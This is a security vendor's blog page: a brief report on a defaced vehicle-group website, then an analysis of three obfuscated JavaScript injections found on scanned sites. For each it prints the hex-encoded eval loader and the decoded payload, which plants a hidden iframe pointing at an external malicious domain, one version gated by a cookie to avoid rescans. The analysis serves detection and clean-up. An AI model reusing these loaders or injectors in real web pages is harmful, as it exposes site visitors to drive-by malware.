Sunday, October 27, 2013

Website of Israel's Largest Vehicle Group Was Hacked and Defaced

Quttera's experts were notified of a hacked website detected via the Online Website Malware Scanner. When the URL was accessed, the site appeared to be defaced (see the screenshot below). The domain belongs to Shlomo Sixt, Israel's largest vehicle group. From the message in the defacement we can assume that it was done by the same hackers who performed the DNS attack on AVG, Avira and WhatsApp earlier this month (an image of that defacement is below as well).

Shlomo Sixt website hacked. Screenshot. 


Looks similar to:

AVG, Avira and WhatsApp websites hacked by pro-Palestinian hackers


We haven't found any press reports about it. It is hard to say whether it was a DNS attack, as in the AVG/Avira/WhatsApp case, or some other kind of attack. We found no official comments by Sixt's representatives on the internet. We can only say that it was fixed promptly, and hope that no sensitive user data was stolen.




Monday, October 21, 2013

Top 3 JavaScript Malware Threats From Last Week

Obfuscated malicious JavaScript code snippets that were detected on scanned websites

Background

Online Website Malware Scanner processes thousands of websites weekly to identify those that contain suspicious code hidden within legitimate web content. Detected malware is dumped and included in the site's malware scan report. The database of scanned domains is publicly available, and you can review the malware report for each of them. For this post we selected several recent examples to present to you because of their level of obfuscation and maliciousness.

To manually review websites listing:
Clean domains
Potentially Suspicious domains
Suspicious domains
Malicious domains

For statistics on website malware detection and severity levels:
Last day 
Last week
Last month


Sample 1 


Detected a hidden iframe automatically injected by malicious code. The iframe downloads content from a blacklisted domain that has already infected 29 other domains, according to the Google Safe Browsing report.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).


Malware details


Beautified script

  1. asq = function () {
  2.     returnn[i];
  3. };
  4. ww = window;
  5. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  6. try {
  7.     document.body = ~1
  8. } catch (dgsgsdg) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. }
  12. if (whwej) {
  13.     try {} catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     try {
  17.         document.body--;
  18.     } catch (bawetawe) {
  19.         if (ww.document) {
  20.             n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x76,0x69,0x65,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x68,0x6d,0x70,0x63,0x62,0x6d,0x77,0x66,0x6f,0x75,0x76,0x73,0x66,0x64,0x70,0x6f,0x74,0x70,0x73,0x75,0x6a,0x76,0x6e,0x2f,0x64,0x70,0x2f,0x76,0x6c,0x30,0x60,0x64,0x70,0x6f,0x75,0x66,0x6f,0x75,0x30,0x64,0x6f,0x75,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x76,0x69,0x65,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x76,0x69,0x65,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x
65,0x3e,0x5d,0x28,0x76,0x69,0x65,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x76,0x69,0x65,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x76,0x69,0x65,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  21.             h = 2;
  22.             s = "";
  23.             if (whwej) {
  24.                 for (= 0; i - 491 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(asq()) - 1));
  27.                 }
  28.                 eval(s);
  29.             }
  30.         }
  31.     }
  32. }


Malicious payload


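The script above decodes the array n by subtracting 1 from each hex value, converting the result to a character with String.fromCharCode (its name is assembled from string fragments) and passing the assembled string to eval(). The decoded payload injects a hidden 1x1-pixel iframe that loads http://globalventureconsortium.co.uk/_content/cnt.php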

  // Decoded payload (analysis listing, not to be executed). An immediately invoked
  // function that creates an iframe pointing at the external URL below and attaches
  // it to the page inside a container element with id 'uhd'.
  1. (function () {
  2.     var uhd = document.createElement('iframe');
  3.     uhd.src = 'http://globalventureconsortium.co.uk/_content/cnt.php';
  // Absolute positioning, no border and a 1px by 1px box at offset (1px, 1px):
  // the frame is effectively invisible to a visitor while its content still loads.
  // A script-created iframe with these dimensions and an off-site src is the
  // indicator to look for when reviewing a page's DOM or a scan report.
  4.     uhd.style.position = 'absolute';
  5.     uhd.style.border = '0';
  6.     uhd.style.height = '1px';
  7.     uhd.style.width = '1px';
  8.     uhd.style.left = '1px';
  9.     uhd.style.top = '1px';
  // Guard: inject only when no element with id 'uhd' exists yet, so the frame is
  // added at most once per page. The container <div> is emitted with
  // document.write and the iframe is then appended to it.
  10.     if (!document.getElementById('uhd')) {
  11.         document.write('<div id=\'uhd\'></div>');
  12.         document.getElementById('uhd').appendChild(uhd);
  13.     }
  14. })();

Blacklisting status


The website is Suspicious on Google Safe Browsing.


Google Safe Browsing diagnostic




Sample 2


Detected a hidden iframe automatically injected by malicious code. The iframe downloads content from a blacklisted domain that has already infected 10 other domains, according to the Google Safe Browsing report.

Malicious action


Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Malware details

Beautified script


  1. asq = function () {
  2.     returnn[i];
  3. };
  4. ww = window;
  5. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  6. try {
  7.     document.body = ~1
  8. } catch (dgsgsdg) {
  9.     zz = 12 * 2 + 1 + 1;
  10.     whwej = 12;
  11. }
  12. if (whwej) {
  13.     try {} catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     try {
  17.         document.body--;
  18.     } catch (bawetawe) {
  19.         if (ww.document) {
  20.             n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x77,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x70,0x6d,0x76,0x6f,0x77,0x66,0x68,0x2f,0x73,0x76,0x30,0x64,0x70,0x76,0x6f,0x75,0x32,0x34,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x77,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x77,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x66,0x77,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e
,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x77,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x66,0x77,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  21.             h = 2;
  22.             s = "";
  23.             if (whwej) {
  24.                 for (= 0; i - 456 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(asq()) - 1));
  27.                 }
  28.                 eval(s);
  29.             }
  30.         }
  31.     }
  32. }

Malicious payload



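The decoder is the same as in Sample 1: each hex value in the array n has 1 subtracted from it, is converted to a character with String.fromCharCode, and the assembled string is passed to eval(). The decoded payload injects a hidden 1x1-pixel iframe that loads http://colunveg.ru/count13.php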


  // Decoded payload (analysis listing, not to be executed). Same structure as the
  // Sample 1 payload: an immediately invoked function that creates an iframe
  // pointing at the external URL below and attaches it under a container with id 'ev'.
  1. (function () {
  2.     var ev = document.createElement('iframe');
  3.     ev.src = 'http://colunveg.ru/count13.php';
  // Absolute positioning, no border and a 1px by 1px box at offset (1px, 1px):
  // the frame is effectively invisible to a visitor while its content still loads.
  4.     ev.style.position = 'absolute';
  5.     ev.style.border = '0';
  6.     ev.style.height = '1px';
  7.     ev.style.width = '1px';
  8.     ev.style.left = '1px';
  9.     ev.style.top = '1px';
  // Guard: inject only when no element with id 'ev' exists yet, so the frame is
  // added at most once per page. The container <div> is emitted with
  // document.write and the iframe is then appended to it.
  10.     if (!document.getElementById('ev')) {
  11.         document.write('<div id=\'ev\'></div>');
  12.         document.getElementById('ev').appendChild(ev);
  13.     }
  14. })();

Blacklisting status

The website is Suspicious on Google Safe Browsing.


Google Safe Browsing diagnostic

Sample 3

Detected a hidden iframe automatically injected by malicious code. The iframe downloads content from a domain that was used to download malware to visitors' PCs, including 1 vulnerability exploit, according to the Google Safe Browsing report.
The malware payload is triggered by cookies. The method is known as a "cookie-bomb attack".

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).


Malware details

Beautified script


  1. gznx = "s" + "p" + "li" + "t";
  2. gqveq = window;
  3. ymn = "dy";
  4. qkayz = document;
  5. gvglsm = "0x";
  6. gku = (5 - 3 - 1);
  7. try {
  8.     ++(qkayz.body)
  9. } catch (atwgx) {
  10.     fvyb = false;
  11.     try {} catch (tcwi) {
  12.         fvyb = 21;
  13.     }
  14.     if (1) {
  15.         ddi ="17:5d:6c:65:5a:6b:60:66:65:17:69:70:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:69:70:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:69:70:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:50:4d:46:45:43:3c:3d:3c:39:4d:49:3c:25:3a:46:44:26:65:64:45:4e:3e:61:2b:6d:25:67:5f:67:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:30:27:2b:27:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:30:27:2b:27:67:6f:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:30:27:2b:27:67:6f:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:30:27:2b:27:1e:32:4:1:17:69:70:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:30:27:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:70:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:69:70:53:1e:17:5a:63:58:6a:6a:34:53:1e:69:70:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:69:70:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:69:70:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c
:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:69:70:27:30:1f:20:32:4:1:74:4:1:74"[gznx](":");
  16.     }
  17.     gqveq = ddi;
  18.     wuicko = [];
  19.     for (omvgs = 22 - 20 - 2; - omvgs + 1385 != 0; omvgs += 1) {
  20.         hev = omvgs;
  21.         if ((0x19 == 031)) wuicko += String["fromCharCode"](eval(gvglsm + gqveq[1 * hev]) + 0xa - gku);
  22.     }
  23.     alert(wuicko);
  24. }

Malicious payload


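The script above splits the colon-separated string into hex values, adds 9 to each (0xa minus gku, where gku evaluates to 1) and converts the result to a character with String.fromCharCode. In the listing the decoded string is passed to alert(), which displays it rather than running it; presumably this call was substituted for analysis. The decoded payload injects a hidden iframe that loads http://YVONLEFEBVRE.COM/nmNWGj4v.php, and does so only when the visited_uq cookie is not already set.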

  // Decoded payload (analysis listing, not to be executed). ry09 creates an iframe
  // pointing at the external URL below and attaches it under a <p> element with id 'ry'.
  1. function ry09() {
  // 'static' and 'controller' are assigned but never read inside this function.
  2.     var static = 'ajax';
  3.     var controller = 'index.php';
  4.     var ry = document.createElement('iframe');
  5.     ry.src = 'http://YVONLEFEBVRE.COM/nmNWGj4v.php';
  // The frame is absolutely positioned. The token 9040 recurs in the colour, size
  // and offset values; left/top are given without a unit.
  // NOTE(review): the values look template-generated; how a browser treats the
  // unitless offsets depends on its rendering mode, so confirm in a sandbox.
  6.     ry.style.position = 'absolute';
  7.     ry.style.color = '9040';
  8.     ry.style.height = '9040px';
  9.     ry.style.width = '9040px';
  10.     ry.style.left = '10009040';
  11.     ry.style.top = '10009040';
  // Guard: inject only when no element with id 'ry' exists yet. The container
  // <p id='ry' class='ry09'> is emitted with document.write and the iframe is
  // then appended to it.
  12.     if (!document.getElementById('ry')) {
  13.         document.write('<p id=\'ry\' class=\'ry09\' ></p>');
  14.         document.getElementById('ry').appendChild(ry);
  15.     }
  16. }
  // Writes a cookie named cookieName with the escaped cookieValue, an expiry of
  // nDays days from now, and an optional path attribute.
  17. function SetCookie(cookieName, cookieValue, nDays, path) {
  18.     var today = new Date();
  19.     var expire = new Date();
  // A null or 0 lifetime falls back to one day.
  20.     if (nDays == null || nDays == 0) nDays = 1;
  // 3600000 ms * 24 = one day; the multiplication also coerces a string nDays to a number.
  21.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  22.     document.cookie = cookieName + "=" + escape(cookieValue)
  23.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }
  // Returns the unescaped value of the cookie called name, or null when
  // document.cookie contains no "name=" entry.
  25. function GetCookie(name) {
  26.     var start = document.cookie.indexOf(name + "=");
  // len is the index of the first character of the value (just past "name=").
  27.     var len = start + name.length + 1;
  // NOTE(review): when start is 0 the cookie string already begins with name,
  // so this branch looks unreachable; it is kept exactly as decoded.
  28.     if ((!start) &&
  29.         (name != document.cookie.substring(0, name.length)))
  30.     {
  31.         return null;
  32.     }
  33.     if (start == -1) return null;
  // The value runs to the next ';' or, if there is none, to the end of the string.
  34.     var end = document.cookie.indexOf(";", len);
  35.     if (end == -1) end = document.cookie.length;
  36.     return unescape(document.cookie.substring(len, end));
  37. }
  // Cookie gate: the iframe is injected only when cookies are enabled and the
  // 'visited_uq' cookie does not already hold 55. On that first hit the cookie is
  // set for one day on path '/' and ry09() runs, so a returning visitor (or a
  // scanner that keeps its cookies) receives no iframe until the cookie expires.
  // When re-testing a cleaned site, request the page with an empty cookie jar.
  38. if (navigator.cookieEnabled)
  39. {
  // Loose equality: the stored string '55' compares equal to the number 55.
  40.     if (GetCookie('visited_uq') == 55) {} else {
  41.         SetCookie('visited_uq', '55', '1', '/');
  42.         ry09();
  43.     }
  44. }

Blacklisting status

Currently, the website is not listed as suspicious on Google Safe Browsing, but it was listed twice over the past 90 days.

Google Safe Browsing diagnostic


Malware clean-up


Such malware is often hidden inside a JavaScript file. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for remediation assessment.

Alternatively, you can try to remove the malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removal from the blacklist.